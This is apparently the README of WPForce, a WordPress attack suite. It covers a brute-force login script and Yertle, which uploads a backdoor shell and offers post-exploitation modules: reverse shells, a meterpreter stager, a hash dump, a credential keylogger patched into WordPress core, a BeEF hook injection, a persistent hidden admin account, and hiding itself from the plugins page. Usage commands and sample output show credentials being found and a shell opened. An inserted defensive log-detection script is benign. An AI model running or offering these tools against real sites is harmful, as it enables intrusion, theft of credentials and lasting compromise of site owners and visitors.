WPForce is a suite of WordPress attack tools. It currently contains two scripts: WPForce, which performs brute-force logins through the API, and Yertle, which uploads a shell once admin credentials are found. Yertle also contains a number of post-exploitation modules.
See the blog post here for more details: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
Blog posts in other languages:
Chinese - www.mottoin.com/100381.html
Portuguese - http://www.100security.com.br/wpforce/
Spanish - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
Russian - https://hackware.ru/?p=2547
French - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/
Turkish - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
Yertle requires the requests library to run.
http://docs.python-requests.org/en/master/user/install/
```
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

[ASCII-art banner: Brute Force Attack Tool for Wordpress ~n00py~]

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
```
```
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.
```
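As an added defender-side example (not part of the WPForce project), the following Python flags the kind of login burst wpforce.py leaves in a web server's access log. It assumes combined-format log lines and that the attempts land on /wp-login.php or /xmlrpc.php (the README only says "through the API"); the sample traffic is constructed.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; only the fields used below are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# WordPress endpoints that accept credentials. Assumption: the README only
# says the brute force goes "through the API", so both are watched.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return the captured fields of one combined-format line, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_login_bursts(lines, threshold=10):
    """Flag source IPs with at least `threshold` POSTs to a login endpoint.
    User agents are reported but never matched on: wpforce.py's -a option
    lets the operator pick an arbitrary one, so they are weak evidence.
    """
    posts, agents = defaultdict(int), defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] in LOGIN_PATHS:
            posts[rec["ip"]] += 1
            agents[rec["ip"]].add(rec["ua"])
    return {ip: {"posts": n, "agents": sorted(agents[ip])}
            for ip, n in posts.items() if n >= threshold}


# Constructed sample traffic (not from a real server): one source hammering
# xmlrpc.php, one normal login, one page view.
def _line(ip, method, path, status, ua, sec):
    return (f'{ip} - - [01/Mar/2017:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')

SAMPLE_LOG = (
    [_line("203.0.113.5", "POST", "/xmlrpc.php", 200, "python-requests", s)
     for s in range(12)]
    + [_line("198.51.100.7", "POST", "/wp-login.php", 302, "Mozilla/5.0", 20),
       _line("198.51.100.8", "GET", "/index.php", 200, "Mozilla/5.0", 21)]
)

if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['posts']} login POSTs, agents={info['agents']}")
```

On real logs, tune the threshold to the site's normal login rate and pair it with rate limiting or lockout on the two endpoints.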
```
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i

[ASCII-art banner: Post-exploitation Module for Wordpress ~n00py~]

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>
```
```
  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell
```
Yertle currently contains the following modules:

```
Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    beef          Injects a BeEF hook into website
    dbcreds       Prints the database credentials
    exit          Terminate the session
    hashdump      Dumps all WordPress password hashes
    help          Help menu
    keylogger     Patches WordPress core to log plaintext credentials
    keylog        Displays keylog file
    meterpreter   Executes a PHP meterpreter stager to connect to metasploit
    persist       Creates an admin account that will re-add itself
    quit          Terminate the session
    shell         Sends a TCP reverse shell to a netcat listener
    stealth       Hides Yertle from the plugins page
```